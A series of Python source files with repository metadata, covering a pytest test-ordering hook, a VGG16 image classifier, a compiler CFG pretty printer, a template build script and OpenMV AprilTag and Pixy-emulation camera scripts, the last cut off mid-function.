        raise UndefinedUnmatchedTestsOrder(
            'The list does not specify the order of unmatched tests.')
    matchers = [(re.compile(pattern), position)
                for position, pattern in enumerate(ordering)
                if pattern is not None]
    return matchers, unmatched_position
def make_reordering_hook(ordered_re_strings_matching_tests):
    """
    Given a list of ordered regexps matching tests, return a hook to arrange tests in that order.

    The tests will be sorted depending on which regular expressions they match.
    This list should contain one None for unmatched tests.

    :param list ordered_re_strings_matching_tests: a list of regular expression strings that match
        nodeids of tests (sample nodeid: 'tests/ui/test_some_ui.py::test_something_ui') and one None
        to specify the order of tests that don't match any of the regular expressions.
        E.g.: ``[r'.*unit', None, r'.*integration']`` - will make the hook place unit tests first,
        then unmatched tests, and integration tests at the end.
    :raise EmptyTestsOrderList: if the ``ordered_re_strings_matching_tests`` list is empty
    :raise UndefinedUnmatchedTestsOrder: if ``ordered_re_strings_matching_tests`` does not contain
        one None, thus does not define the order of unmatched tests
    :rtype: function
    :return: a valid ``pytest_collection_modifyitems`` hook to reorder collected tests
    """
    re_to_order, unmatched_order = unpack_test_ordering(ordered_re_strings_matching_tests)

    def pytest_collection_modifyitems(session, config, items):
        def sort_key(item):
            """
            Get the sort key for tests reordering.

            All items matching the same regular expression will get the same key. This is OK
            since ``list.sort`` is stable.

            :rtype: int
            :return: sort key dependent on the matched regex; integer starting from zero
            """
            for regex, order in re_to_order:
                if regex.match(item.nodeid):
                    return order
            return unmatched_order

        items.sort(key=sort_key)

    # BUG FIX: the original wrote ``"""...""" % (...)`` as the hook's first
    # statement.  That is a string-formatting *expression*, evaluated and
    # discarded - it never becomes the docstring.  Assign __doc__ explicitly
    # so the generated hook is actually documented.
    pytest_collection_modifyitems.__doc__ = (
        'Reorder tests according to the list %r.' % (ordered_re_strings_matching_tests,))
    return pytest_collection_modifyitems
# Ready-made hook instance implementing DEFAULT_ORDER
# (unit -> unmatched -> integration -> ui).
default_reordering_hook = make_reordering_hook(DEFAULT_ORDER)
| {
"repo_name": "not-raspberry/pytest_reorder",
"path": "pytest_reorder/reorder.py",
"copies": "1",
"size": "4241",
"license": "mit",
"hash": -9166820939986367000,
"line_mean": 38.2685185185,
"line_max": 100,
"alpha_frac": 0.6722471115,
"autogenerated": false,
"ratio": 4.04675572519084,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.521900283669084,
"avg_score": null,
"num_lines": null
} |
"""A pre-trained implimentation of VGG16 with weights trained on ImageNet.
NOTE: It's not a great idea to use tf.constant to take in large arrays that will
not change, better to use a non-trainable variable.
https://stackoverflow.com/questions/41150741/in-tensorflow-what-is-the-difference-between-a-constant-and-a-non-trainable-var?rq=1
"""
##########################################################################
# Special thanks to
# http://www.cs.toronto.edu/~frossard/post/vgg16/
# for converting the caffe VGG16 pre-trained weights to TensorFlow
# this file is essentially just a restylized version of his vgg16.py
##########################################################################
from __future__ import print_function, absolute_import, division
import os
import numpy as np
from scipy.misc import imread, imresize
import tensorflow as tf
_debug = False
def pretrained_conv_layer(name, input_tensor, params):
    r"""Create a stride-1 'SAME' convolution + ReLU layer from pre-trained weights.

    Args:
        name: A `str`, the name for the operation defined by this function;
            also keys the weight/bias arrays as ``params[name + '_W']`` and
            ``params[name + '_b']``.
        input_tensor: A `Tensor` to convolve.
        params: A mapping (e.g. the loaded ``.npz`` archive) from layer-name
            keys to pre-trained weight and bias arrays.

    Returns:
        The ReLU-activated convolution output `Tensor`.
    """
    with tf.name_scope(name):
        # Weights are frozen as constants - this layer is not trainable.
        weights = tf.constant(params[name+'_W'])
        biases = tf.constant(params[name+'_b'])
        conv = tf.nn.conv2d(input=input_tensor,
                            filter=weights,
                            strides=[1, 1, 1, 1],
                            padding='SAME',
                            name='convolution')
        preactivations = tf.nn.bias_add(conv, biases, name='bias_addition')
        activations = tf.nn.relu(preactivations, name='activation')
        return activations
def pretrained_fc_layer(name, in_tensor, params, sigmoid=tf.nn.relu):
    """Create a fully-connected layer from the pre-trained arrays in ``params``.

    ``sigmoid`` is the activation applied to the affine output (ReLU by
    default; pass e.g. ``tf.nn.softmax`` for the final layer).
    """
    with tf.name_scope(name):
        # Frozen (non-trainable) parameters, keyed by layer name.
        kernel = tf.constant(params[name + '_W'])
        bias = tf.constant(params[name + '_b'])
        affine = tf.nn.bias_add(tf.matmul(in_tensor, kernel), bias)
        return sigmoid(affine, name='activation')
class PreTrainedVGG16:
    """VGG16 with weights pre-trained on ImageNet.

    The inference graph is built eagerly in the constructor when both a
    weights file and a TensorFlow session are supplied.
    """

    def __init__(self, weights=None, session=None):
        # BUG FIX: store the session - the query methods below previously
        # relied on module-level globals ``sess``/``vgg`` that only exist
        # when this file is run as a script.
        self.session = session
        if weights is not None and session is not None:
            self.parameters = np.load(weights)
            self.input_images = tf.placeholder(tf.float32, (None, 224, 224, 3))
            self.activations = self._build_graph()
            self.output = self.activations['fc8']

    @staticmethod
    def get_class_names():
        """Return the ImageNet class names, one per line of the text file."""
        with open('ImageNet_Classes.txt') as names_file:
            return [l.replace('\n', '') for l in names_file]

    def _prepared(self, images, auto_resize):
        # Helper: bring every image to the fixed 224x224 input resolution.
        if auto_resize:
            return [imresize(im, (224, 224)) for im in images]
        return images

    def get_output(self, images, auto_resize=True):
        """Take a list of images; return softmax probabilities for the first one."""
        feed_dict = {self.input_images: self._prepared(images, auto_resize)}
        # BUG FIX: use the stored session and this instance's output tensor
        # instead of the script-level globals ``sess`` and ``vgg``.
        return self.session.run(self.output, feed_dict)[0]

    def get_activations(self, images, auto_resize=True):
        """Take a list of images; return the dict of layer-name -> activations."""
        feed_dict = {self.input_images: self._prepared(images, auto_resize)}
        # BUG FIX: running a dict of tensors yields a dict keyed by layer name,
        # which cannot be indexed with [0]; return the whole dictionary.
        # Each value keeps its leading batch dimension.
        return self.session.run(self.activations, feed_dict)

    def _build_graph(self):
        """Assemble the VGG16 graph; return a name -> tensor activation dict."""
        # pooling arguments
        _ksize = [1, 2, 2, 1]
        _strides = [1, 2, 2, 1]
        # center the input images on the ImageNet per-channel means
        with tf.name_scope('preprocess_centering'):
            mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32,
                               shape=[1, 1, 1, 3], name='img_mean')
            c_images = self.input_images - mean
        # images --> conv1_1 --> conv1_2 --> pool1
        conv1_1 = pretrained_conv_layer('conv1_1', c_images, self.parameters)
        conv1_2 = pretrained_conv_layer('conv1_2', conv1_1, self.parameters)
        pool1 = tf.nn.max_pool(conv1_2, _ksize, _strides, 'SAME', name='pool1')
        # pool1 --> conv2_1 --> conv2_2 --> pool2
        conv2_1 = pretrained_conv_layer('conv2_1', pool1, self.parameters)
        conv2_2 = pretrained_conv_layer('conv2_2', conv2_1, self.parameters)
        pool2 = tf.nn.max_pool(conv2_2, _ksize, _strides, 'SAME', name='pool2')
        # pool2 --> conv3_1 --> conv3_2 --> conv3_3 --> pool3
        conv3_1 = pretrained_conv_layer('conv3_1', pool2, self.parameters)
        conv3_2 = pretrained_conv_layer('conv3_2', conv3_1, self.parameters)
        conv3_3 = pretrained_conv_layer('conv3_3', conv3_2, self.parameters)
        pool3 = tf.nn.max_pool(conv3_3, _ksize, _strides, 'SAME', name='pool3')
        # pool3 --> conv4_1 --> conv4_2 --> conv4_3 --> pool4
        conv4_1 = pretrained_conv_layer('conv4_1', pool3, self.parameters)
        conv4_2 = pretrained_conv_layer('conv4_2', conv4_1, self.parameters)
        conv4_3 = pretrained_conv_layer('conv4_3', conv4_2, self.parameters)
        pool4 = tf.nn.max_pool(conv4_3, _ksize, _strides, 'SAME', name='pool4')
        # pool4 --> conv5_1 --> conv5_2 --> conv5_3 --> pool5
        conv5_1 = pretrained_conv_layer('conv5_1', pool4, self.parameters)
        conv5_2 = pretrained_conv_layer('conv5_2', conv5_1, self.parameters)
        conv5_3 = pretrained_conv_layer('conv5_3', conv5_2, self.parameters)
        pool5 = tf.nn.max_pool(conv5_3, _ksize, _strides, 'SAME', name='pool5')
        # pool5 --> flatten --> fc6 --> fc7 --> fc8 (softmax)
        shape = int(np.prod(pool5.get_shape()[1:]))
        pool5_flat = tf.reshape(pool5, [-1, shape])
        fc1 = pretrained_fc_layer('fc6', pool5_flat, self.parameters)
        fc2 = pretrained_fc_layer('fc7', fc1, self.parameters)
        fc3 = pretrained_fc_layer('fc8', fc2, self.parameters, tf.nn.softmax)
        activations = {
            'conv1_1': conv1_1, 'conv1_2': conv1_2, 'pool1': pool1,
            'conv2_1': conv2_1, 'conv2_2': conv2_2, 'pool2': pool2,
            'conv3_1': conv3_1, 'conv3_2': conv3_2, 'conv3_3': conv3_3, 'pool3': pool3,
            'conv4_1': conv4_1, 'conv4_2': conv4_2, 'conv4_3': conv4_3, 'pool4': pool4,
            'conv5_1': conv5_1, 'conv5_2': conv5_2, 'conv5_3': conv5_3, 'pool5': pool5,
            'fc6': fc1, 'fc7': fc2, 'fc8': fc3
        }
        return activations
if __name__ == '__main__':
    # Get input
    input_images = [imread('testflash.jpg', mode='RGB')]
    # Check 'vgg16_weights.npz' exists before building anything.
    if not os.path.isfile('vgg16_weights.npz'):
        raise Exception(
            "The weights I use here were converted from the Caffe Model Zoo "
            "weights by Davi Frossard. He didn't include a license so I'm "
            "hesistant to re-post them. Please download them from his "
            "website:\nhttp://www.cs.toronto.edu/~frossard/post/vgg16/")
    # Build VGG16
    if _debug:
        sess = tf.InteractiveSession()
    else:
        sess = tf.Session()
    vgg = PreTrainedVGG16('vgg16_weights.npz', sess)
    # Run images through network, return softmax probabilities
    # (timed to report single-inference latency).
    from time import time
    a = time()
    class_probabilities = vgg.get_output(input_images)
    print(time()-a)
    # Get Class Names
    class_names = vgg.get_class_names()
    # Report results.
    # NOTE(review): despite the name, top5 holds the top *10* indices.
    top5 = (np.argsort(class_probabilities)[::-1])[0:10]
    with open('results.txt', 'w') as f:
        for p in np.argsort(class_probabilities)[::-1]:
            f.write(str(class_probabilities[p]) + ' : ' + class_names[p] + '\n')
    for p in top5:
        print(class_probabilities[p], ' : ', class_names[p])
| {
"repo_name": "mathandy/Classifiers2LearnWith",
"path": "experiments/vgg16_pre-trained/vgg16_pre-trained-alt.py",
"copies": "1",
"size": "7715",
"license": "mit",
"hash": -1447211170855051800,
"line_mean": 40.7027027027,
"line_max": 129,
"alpha_frac": 0.5935191186,
"autogenerated": false,
"ratio": 3.360191637630662,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9451678980291782,
"avg_score": 0.0004063551877759528,
"num_lines": 185
} |
'''A pretty printer for Runa CFG nodes.
This module implements another CFG walker, which spits out a string
represenation of the given CFG object. This is intended as a debugging aid
during compiler development, and can be invoked using the compiler driver's
`show` command (parametrized with the last pass to run before printing.
'''
from . import types, util
class PrettyPrinter(object):
    """Walks a CFG and accumulates a string representation in ``self.buf``.

    ``visit`` dispatches on the node's class name, so each method below named
    after a node class renders that node type.
    """
    def __init__(self):
        self.buf = []  # accumulated output fragments; joined at the end of build()
    def newline(self):
        self.buf.append('\n')
    def write(self, data):
        # Only str fragments are accepted; catches accidental non-string writes early.
        assert isinstance(data, str), data
        self.buf.append(data)
    def writeline(self, ln):
        # Empty/falsy lines are dropped entirely (no blank line is emitted).
        if not ln: return
        self.write(ln + '\n')
    def visit(self, node):
        """Dispatch: types render via type(); other nodes via their class name."""
        if isinstance(node, types.base):
            self.type(node)
        else:
            getattr(self, node.__class__.__name__)(node)
    def build(self, name, fun):
        """Render function ``fun`` (header plus numbered blocks/steps); return the string."""
        # Qualified names arrive as tuples; join them with dots.
        name = '.'.join(name) if isinstance(name, tuple) else name
        self.start = False
        self.write('def %s(' % name)
        for i, node in enumerate(fun.args):
            self.visit(node)
            if i < len(fun.args) - 1:
                self.write(', ')
        self.write(')')
        if fun.rtype is not None:
            self.write(' -> ')
            self.type(fun.rtype)
        self.write(':')
        self.newline()
        # One line per block ("<id>: # <annotation>"), then one line per step
        # prefixed with its step index ("{<sid>}").
        for i, bl in sorted(util.items(fun.flow.blocks)):
            self.writeline(' %2i: # %s' % (i, bl.anno))
            for sid, step in enumerate(bl.steps):
                self.write('    {%02i} ' % sid)
                self.visit(step)
                self.newline()
        return ''.join(self.buf)
    def type(self, node):
        self.write(node.name)
    def anno(self, node):
        """Append a "[type:E]" annotation for typed and/or escaping nodes."""
        if node.type is None and not getattr(node, 'escapes', False):
            return
        # Function and Type types are not annotated.
        if isinstance(node.type, (types.function, types.Type)):
            return
        self.write(' [')
        if node.type is not None:
            self.visit(node.type)
        if node.type is not None and getattr(node, 'escapes', False):
            self.write(':')
        if getattr(node, 'escapes', False):
            self.write('E')
        self.write(']')
    # --- leaf/value nodes -------------------------------------------------
    def NoneVal(self, node):
        self.write('NoneVal')
        self.anno(node)
    def Name(self, node):
        self.write(node.name)
        self.anno(node)
    def Bool(self, node):
        self.write(str(node.val))
        self.anno(node)
    def Int(self, node):
        self.write(str(node.val))
        self.anno(node)
    def Float(self, node):
        self.write(str(node.val))
        self.anno(node)
    def String(self, node):
        self.write(repr(node.val))
        self.anno(node)
    def Tuple(self, node):
        self.write('(')
        for i, n in enumerate(node.values):
            if i:
                self.write(', ')
            self.visit(n)
        self.write(')')
    # --- operators --------------------------------------------------------
    def binary(self, op, node):
        # Shared renderer for all binary operators: "<op> <left> <right>".
        self.write(op + ' ')
        self.visit(node.left)
        self.write(' ')
        self.visit(node.right)
    def As(self, node):
        self.write('As ')
        self.visit(node.left)
        self.write(' ')
        self.visit(node.type)
    def Not(self, node):
        self.write('Not ')
        self.visit(node.value)
    def And(self, node):
        self.binary('And', node)
    def Or(self, node):
        self.binary('Or', node)
    def Is(self, node):
        self.binary('Is', node)
    def NE(self, node):
        self.binary('NE', node)
    def GT(self, node):
        self.binary('GT', node)
    def LT(self, node):
        self.binary('LT', node)
    def EQ(self, node):
        self.binary('EQ', node)
    def Add(self, node):
        self.binary('Add', node)
    def Sub(self, node):
        self.binary('Sub', node)
    def Mod(self, node):
        self.binary('Mod', node)
    def Mul(self, node):
        self.binary('Mul', node)
    def Div(self, node):
        self.binary('Div', node)
    def BWAnd(self, node):
        self.binary('BWAnd', node)
    def BWOr(self, node):
        self.binary('BWOr', node)
    def BWXor(self, node):
        self.binary('BWXor', node)
    def IAdd(self, node):
        self.binary('IAdd', node)
    # --- statements and control flow --------------------------------------
    def Pass(self, node):
        self.write('Pass')
    def Init(self, node):
        self.write('Init ')
        self.visit(node.type)
    def Argument(self, node):
        self.write(node.name.name)
        self.anno(node)
    def Assign(self, node):
        self.visit(node.left)
        self.write(' = ')
        self.visit(node.right)
    def Call(self, node):
        self.visit(node.name)
        self.write('(')
        for i, arg in enumerate(node.args):
            self.visit(arg)
            if i < len(node.args) - 1:
                self.write(', ')
        self.write(')')
        self.anno(node)
        # Invoke-style calls carry a (normal, exception) branch-target pair.
        if node.callbr is not None:
            self.write(' => %s, %s' % node.callbr)
    def Return(self, node):
        self.write('Return')
        if node.value is not None:
            self.write(' ')
            self.visit(node.value)
    def Yield(self, node):
        self.write('Yield')
        if node.value is not None:
            self.write(' ')
            self.visit(node.value)
    def Raise(self, node):
        self.write('Raise ')
        self.visit(node.value)
    def CondBranch(self, node):
        # Ternary-style rendering: "CondBranch <cond> ? <then-block> : <else-block>".
        self.write('CondBranch ')
        self.visit(node.cond)
        self.write(' ? %s : %s' % (node.tg1, node.tg2))
    def Branch(self, node):
        self.write('Branch %s' % node.label)
    def Attrib(self, node):
        self.visit(node.obj)
        self.write(' . ')
        self.write(node.attrib)
        self.anno(node)
    def SetAttr(self, node):
        # Rendered identically to attribute reads.
        self.Attrib(node)
    def Elem(self, node):
        self.write('Elem(')
        self.visit(node.obj)
        self.write(', ')
        self.visit(node.key)
        self.write(')')
        self.anno(node)
    def Phi(self, node):
        # SSA phi node: "<block>:<value>" per incoming edge.
        self.write('Phi ')
        self.write('%s:' % node.left[0])
        self.visit(node.left[1])
        self.write(', ')
        self.write('%i:' % node.right[0])
        self.visit(node.right[1])
    def For(self, node):
        self.visit(node.lvar)
        self.write(' <- ')
        self.visit(node.source)
    def LPad(self, node):
        # Landing pad: maps caught types to handler blocks.
        self.write('LPad: %s {' % node.var)
        for k, v in util.items(node.map):
            self.visit(k)
            self.write(': ' + str(v))
        self.write('}')
    def Resume(self, node):
        self.write('Resume: %s' % node.var)
    def LoopSetup(self, node):
        self.write('LoopSetup ')
        self.visit(node.loop)
    def LoopHeader(self, node):
        self.write('LoopHeader ctx:')
        self.visit(node.ctx)
        self.write(' lvar:')
        self.visit(node.lvar)
        self.write(' %s:%s' % (node.tg1, node.tg2))
    def Free(self, node):
        self.write('Free(')
        self.visit(node.value)
        self.write(')')
def prettify(name, flow):
    """Render the function ``flow`` (named ``name``) to a readable string."""
    return PrettyPrinter().build(name, flow)
| {
"repo_name": "djc/runa",
"path": "runac/pretty.py",
"copies": "1",
"size": "5902",
"license": "mit",
"hash": 3103162756587728000,
"line_mean": 19.4221453287,
"line_max": 75,
"alpha_frac": 0.6262283972,
"autogenerated": false,
"ratio": 2.6863905325443787,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.38126189297443785,
"avg_score": null,
"num_lines": null
} |
#** apricot.R = 1 **#
def build(basefile, outfile, rs, vs, rm, e):
    """Expand apricot directives in ``basefile`` and write the result to ``outfile``.

    rs -- resource selections, "label=value" strings for import directives
    vs -- value substitutions, "label=value" strings for set directives
    rm -- removal patterns, "...=regex" strings; matching lines are dropped
    e  -- language key into the module-level ``apricot_comment`` table,
          which supplies the comment open/close markers
    """
    currentdir = os.getcwd()
    tmpfile = "apricot.tmp.{}".format(e)
    b = "{}/{}".format(currentdir, basefile)
    t = "{}/{}".format(currentdir, tmpfile)
    # Work on a temporary copy of the base file.
    shutil.copy(b, t)
    # Create the output file
    fl = open(outfile, 'w')
    # Main processing
    f = open(tmpfile, 'r')
    codes = f.readlines()
    i = 0  # line counter
    #
    # Process the template one line at a time
    #
    for code in codes:
        #
        # Handle "remove codes" patterns
        #
        i += 1
        for ptn in rm:
            ptn = ptn.split("=")[-1]
            if re.match(ptn, code) is not None:
                print "@{}:{} removed ({}): {}".format(tmpfile, i, ptn, code[:-1])
                code = ''
        #
        # Handle "set Values" substitutions
        #
        cmt = "{}set ".format(apricot_comment[e][0])  # ex. "/** apricot.set "
        pos = code.find(cmt)
        if pos >= 0:
            cmtb = " {}".format(apricot_comment[e][1])  # ex. " **/"
            vlabel = code.split(cmt)[-1].split(cmtb)[0]
            value = ''
            # Last matching "label=value" entry wins.
            for v in vs:
                ptn = v.split("=")[0]
                if ptn == vlabel:
                    value = v.split("=")[-1]
            if value != '':
                rep = "{}set {} {}".format(apricot_comment[e][0], vlabel, apricot_comment[e][1])
                # ex. "/** apricot.set Va **/"
                code = code.replace(rep, value)
                print "@{}:{} setted ({}): {}".format(tmpfile, i, vlabel, value)
        #
        # Handle "import Resources" directives
        #
        cmt = "{}import ".format(apricot_comment[e][0])  # ex. "/** apricot.import "
        pos = code.find(cmt)
        if pos >= 0:
            cmtb = " {}".format(apricot_comment[e][1])  # ex. " **/"
            # Directive payload is "<resource-file>/<label>".
            rstr = code.split(cmt)[-1].split(cmtb)[0]
            rfile = rstr.split("/")[0]
            rlabel = rstr.split("/")[-1]
            value = ''
            for r in rs:
                ptn = r.split("=")[0]
                if ptn == rlabel:
                    value = r.split("=")[-1]
            code_a = get_code(rfile, rlabel, value, e)
            rep = "{}import {}/{} {}".format(apricot_comment[e][0],
                                             rfile,
                                             rlabel,
                                             apricot_comment[e][1])
            if(code_a != ""):
                code = code.replace(rep, code_a)
                print "@{}:{} imported ({}/{}): {}".format(tmpfile, i, rfile, rlabel, value)
            else:
                # No snippet found: comment the directive line out instead.
                code = "// {}".format(code)
                print "@{}:{} NOT imported ({}): {}".format(tmpfile, i, rlabel, value)
            #print code_a
        fl.write(code)
    f.close()
    fl.close()
    os.remove(tmpfile)
    return 1
def get_code(f, l, val, e):
    """Return the snippet labelled ``val`` from resource file ``f``.

    The file is split on the language's "apricot.R = " marker; the snippet
    whose header starts with "<val> <comment-close>" is returned with leading
    whitespace stripped, or "" when no snippet matches.

    f   -- path of the resource file
    l   -- resource label (kept for interface compatibility; unused here)
    val -- selection value to match against each snippet header
    e   -- language key into the module-level ``apricot_comment`` table
    """
    # BUG FIX: use open() instead of the Python-3-removed file() builtin
    # (identical behavior on Python 2); close the handle deterministically.
    fl = open(f, 'r')
    try:
        content = fl.read()
    finally:
        fl.close()
    ptn = "{}R = ".format(apricot_comment[e][0])  # ex. "/** apricot.R = "
    snippets = content.split(ptn)
    q = "{} {}".format(val, apricot_comment[e][1])  # ex. "en **/"
    for snippet in snippets:
        # A snippet belongs to ``val`` when its header is exactly at offset 0.
        if snippet.find(q) == 0:
            c = snippet.split(q)[-1]
            # Strip leading whitespace/newlines (win, mac, unix); the original
            # called lstrip() twice, which is redundant.
            return c.lstrip()
    return ""
"repo_name": "daiz713/Universe",
"path": "beta/build.py",
"copies": "1",
"size": "3508",
"license": "mit",
"hash": 1000598568892304500,
"line_mean": 33.5353535354,
"line_max": 96,
"alpha_frac": 0.4148624927,
"autogenerated": false,
"ratio": 3.1736304549675025,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40884929476675025,
"avg_score": null,
"num_lines": null
} |
# AprilTags Example
#
# This example shows the power of the OpenMV Cam to detect April Tags
# on the OpenMV Cam M7. The M4 versions cannot detect April Tags.
import sensor, image, time, math
# Camera setup: grayscale QQVGA keeps the frame small enough for AprilTags.
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger...
sensor.skip_frames(time = 2000)
sensor.set_auto_gain(False) # must turn this off to prevent image washout...
clock = time.clock()
# Note! Unlike find_qrcodes the find_apriltags method does not need lens correction on the image to work.
# The apriltag code supports up to 6 tag families which can be processed at the same time.
# Returned tag objects will have their tag family and id within the tag family.
# Families are OR'd together into one bitmask passed to find_apriltags().
tag_families = 0
tag_families |= image.TAG16H5 # comment out to disable this family
tag_families |= image.TAG25H7 # comment out to disable this family
tag_families |= image.TAG25H9 # comment out to disable this family
tag_families |= image.TAG36H10 # comment out to disable this family
tag_families |= image.TAG36H11 # comment out to disable this family (default family)
tag_families |= image.ARTOOLKIT # comment out to disable this family
# What's the difference between tag families? Well, for example, the TAG16H5 family is effectively
# a 4x4 square tag. So, this means it can be seen at a longer distance than a TAG36H11 tag which
# is a 6x6 square tag. However, the lower H value (H5 versus H11) means that the false positve
# rate for the 4x4 tag is much, much, much, higher than the 6x6 tag. So, unless you have a
# reason to use the other tags families just use TAG36H11 which is the default family.
def family_name(tag):
    """Return the printable name of *tag*'s AprilTag family (None if unknown)."""
    names = {
        image.TAG16H5: "TAG16H5",
        image.TAG25H7: "TAG25H7",
        image.TAG25H9: "TAG25H9",
        image.TAG36H10: "TAG36H10",
        image.TAG36H11: "TAG36H11",
        image.ARTOOLKIT: "ARTOOLKIT",
    }
    return names.get(tag.family())
while(True):
    clock.tick()
    img = sensor.snapshot()
    for tag in img.find_apriltags(families=tag_families): # defaults to TAG36H11 without "families".
        # Mark each detection on the frame buffer for the IDE preview.
        img.draw_rectangle(tag.rect(), color = (255, 0, 0))
        img.draw_cross(tag.cx(), tag.cy(), color = (0, 255, 0))
        # Rotation is reported in radians; convert to degrees for display.
        print_args = (family_name(tag), tag.id(), (180 * tag.rotation()) / math.pi)
        print("Tag Family %s, Tag ID %d, rotation %f (degrees)" % print_args)
    print(clock.fps())
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/26-April-Tags/find_apriltags.py",
"copies": "2",
"size": "2546",
"license": "mit",
"hash": 2251345702936042500,
"line_mean": 44.4642857143,
"line_max": 105,
"alpha_frac": 0.7054202671,
"autogenerated": false,
"ratio": 3.2936610608020698,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9954072905369749,
"avg_score": 0.009001684506464366,
"num_lines": 56
} |
# AprilTags Max Res Example
#
# This example shows the power of the OpenMV Cam to detect April Tags
# on the OpenMV Cam M7. The M4 versions cannot detect April Tags.
import sensor, image, time, math, omv
# Camera setup: VGA capture cropped to a board-dependent window, because
# find_apriltags() works on a maximum of < 64K pixels.
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.VGA) # we run out of memory if the resolution is much bigger...
# AprilTags works on a maximum of < 64K pixels.
if omv.board_type() == "H7": sensor.set_windowing((240, 240))
elif omv.board_type() == "M7": sensor.set_windowing((200, 200))
else: raise Exception("You need a more powerful OpenMV Cam to run this script")
sensor.skip_frames(time = 2000)
sensor.set_auto_gain(False) # must turn this off to prevent image washout...
clock = time.clock()
# Note! Unlike find_qrcodes the find_apriltags method does not need lens correction on the image to work.
# The apriltag code supports up to 6 tag families which can be processed at the same time.
# Returned tag objects will have their tag family and id within the tag family.
# Families are OR'd together into one bitmask passed to find_apriltags().
tag_families = 0
tag_families |= image.TAG16H5 # comment out to disable this family
tag_families |= image.TAG25H7 # comment out to disable this family
tag_families |= image.TAG25H9 # comment out to disable this family
tag_families |= image.TAG36H10 # comment out to disable this family
tag_families |= image.TAG36H11 # comment out to disable this family (default family)
tag_families |= image.ARTOOLKIT # comment out to disable this family
# What's the difference between tag families? Well, for example, the TAG16H5 family is effectively
# a 4x4 square tag. So, this means it can be seen at a longer distance than a TAG36H11 tag which
# is a 6x6 square tag. However, the lower H value (H5 versus H11) means that the false positve
# rate for the 4x4 tag is much, much, much, higher than the 6x6 tag. So, unless you have a
# reason to use the other tags families just use TAG36H11 which is the default family.
def family_name(tag):
    """Return the printable name of *tag*'s AprilTag family (None if unknown)."""
    labels = (
        (image.TAG16H5, "TAG16H5"),
        (image.TAG25H7, "TAG25H7"),
        (image.TAG25H9, "TAG25H9"),
        (image.TAG36H10, "TAG36H10"),
        (image.TAG36H11, "TAG36H11"),
        (image.ARTOOLKIT, "ARTOOLKIT"),
    )
    for family, label in labels:
        if tag.family() == family:
            return label
while(True):
    clock.tick()
    img = sensor.snapshot()
    for tag in img.find_apriltags(families=tag_families): # defaults to TAG36H11 without "families".
        # Mark each detection (grayscale 127) for the IDE preview.
        img.draw_rectangle(tag.rect(), color = 127)
        img.draw_cross(tag.cx(), tag.cy(), color = 127)
        # Rotation is reported in radians; convert to degrees for display.
        print_args = (family_name(tag), tag.id(), (180 * tag.rotation()) / math.pi)
        print("Tag Family %s, Tag ID %d, rotation %f (degrees)" % print_args)
    print(clock.fps())
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/26-April-Tags/find_apriltags_max_res.py",
"copies": "2",
"size": "2795",
"license": "mit",
"hash": -6554370241799320000,
"line_mean": 45.5833333333,
"line_max": 105,
"alpha_frac": 0.7076923077,
"autogenerated": false,
"ratio": 3.2766705744431417,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49843628821431424,
"avg_score": null,
"num_lines": null
} |
# AprilTags Pixy I2C Emulation Script
#
# This script allows your OpenMV Cam to transmit AprilTag detection data like
# a Pixy (CMUcam5) tracking colors in I2C mode. This script allows you to
# easily replace a Pixy (CMUcam5) color tracking sensor with an OpenMV Cam
# AprilTag tracking sensor. Note that this only runs on the OpenMV Cam M7.
#
# P4 = SCL
# P5 = SDA
#
# P7 = Servo 1
# P8 = Servo 2
# Note: The tag family is TAG36H11. Additionally, in order to for the
# signature value of a tag detection to be compatible with pixy
# interface libraries all tag ids have 8 added to them in order
# to move them in the color code signature range. Finally, tags
# are all reported as color code blocks...
# Pixy Parameters ############################################################
max_blocks = 1000         # global cap on blocks reported per frame
max_blocks_per_id = 1000  # per-signature cap on blocks reported per frame
i2c_address = 0x54
# Pan Servo
s0_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s0_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
# Tilt Servo
s1_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s1_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
analog_out_enable = False # P6 -> Analog Out (0v - 3.3v).
analog_out_mode = 0 # 0 == x position of largest tag - 1 == y position of largest tag
##############################################################################
import image, math, pyb, sensor, struct, time
# Camera Setup
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time = 2000)
# LED Setup: all LEDs start off; the host drives them via the LED-control command.
red_led = pyb.LED(1)
green_led = pyb.LED(2)
blue_led = pyb.LED(3)
red_led.off()
green_led.off()
blue_led.off()
# DAC Setup (only when analog out is enabled); idle at 0V.
dac = pyb.DAC("P6") if analog_out_enable else None
if dac:
    dac.write(0)
# Servo Setup
min_s0_limit = min(s0_lower_limit, s0_upper_limit)
max_s0_limit = max(s0_lower_limit, s0_upper_limit)
min_s1_limit = min(s1_lower_limit, s1_upper_limit)
max_s1_limit = max(s1_lower_limit, s1_upper_limit)
s0_pan = pyb.Servo(1) # P7
s1_tilt = pyb.Servo(2) # P8
# BUG FIX: center the servos at the midpoint of their pulse-width range.
# The original computed (max - min) // 2 -- half the *span* (500 us with the
# defaults), which lies below the configured lower limit instead of centering.
s0_pan.pulse_width(int((min_s0_limit + max_s0_limit) // 2)) # center
s1_tilt.pulse_width(int((min_s1_limit + max_s1_limit) // 2)) # center
# Scale factors mapping the Pixy 0..1000 command range onto the pulse span.
s0_pan_conversion_factor = (max_s0_limit - min_s0_limit) / 1000
s1_tilt_conversion_factor = (max_s1_limit - min_s1_limit) / 1000
def s0_pan_position(value):
    # Map a Pixy-style 0..1000 command (clamped) onto servo 0's pulse-width range.
    s0_pan.pulse_width(round(s0_lower_limit + (max(min(value, 1000), 0) * s0_pan_conversion_factor)))
def s1_tilt_position(value):
